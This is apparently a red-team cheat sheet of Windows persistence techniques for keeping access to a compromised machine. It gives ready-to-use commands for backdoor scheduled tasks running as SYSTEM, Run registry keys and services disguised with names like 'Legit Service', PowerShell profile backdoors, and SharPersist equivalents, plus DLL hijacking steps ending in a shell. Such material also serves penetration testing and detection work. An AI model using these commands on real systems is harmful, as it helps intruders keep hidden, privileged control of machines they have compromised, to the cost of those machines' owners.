Here are some common methods for maintaining access. If you find any errors or need to update anything, please mail me!
Schedule Task
We can create schedule to execute our specified binary or command. For example if we want to execute UpdateMessenger.exe
every two hour. We can use below methods.
Native Windows Command
Upload your backdoor and run following command:
schtasks /create /sc hourly /mo 2 /tn "UpdateMessenger" /tr C:\Windows\Tasks\UpdateMessenger.exe /ru "SYSTEM"
Using SharPersist
.\SharPersist.exe -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
Registry Persistence
By Modifying Registry key, attacker can start specified binary at startup.
Native Windows Command
For current compromised user
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"
If you have system access
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Legit Service" /t REG_SZ /F /D "C:\Windows\Tasks\legit.exe"
Using SharPersist
.\SharPersist.exe -t reg -c "C:\Windows\Tasks\legit.exe" -a "/c calc.exe" -k "Legit Service" -v "Test Stuff" -m add
As a result, whenever compromised system reboot, attack get reconnected.
Backdoor as a Service
If we create service we can execute our backdoor as a service
Native Windows command
sc create evilsvc binpath= "C:\Windows\Tasks\legit.exe" start= "auto" obj= "LocalSystem"
Using SharPersist
.\SharPersist.exeSharPersist -t service -c "C:\Windows\Tasks\legit.exe" -n "Legit Service" -m add
Powershell Profile
Whenever compromised user execute powershell
, our backdoor also get executed!
- Create a file called
profile.ps1
in%HOMEPATH%"\Documents"\windowspowershell
- Store your command to be executed!
echo "c:\Windows\Tasks\legit.exe" > %HOMEPATH%"\Documents"\windowspowershell\profile.ps1
DLL Hijacking
When a new process started, it searches for required libraries from some locations.
DLL Search Order:
1. The Application Directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\windows
5. Current Working Directory
6. Directories in %PATH% environment variable
How to Hijack?
- To hijack dll, we need to find which dll is not found but searched. We can use ProcMon and filter the Application name and
Not Found
Keyword. - Then using
icacls c:\TargetApp
, we can verify if the directory is writable. - If the directory is writable, we can make our malicious dll but name it same as the legit dll that is not found. Then copy to that directory.
- If everything done correctly, we will get shell if the vulnerable application re-executed!
Note
: WinPEAS has capability to search, if DLL Hijacking is possible!
Other interesting methods is being noted to be added here!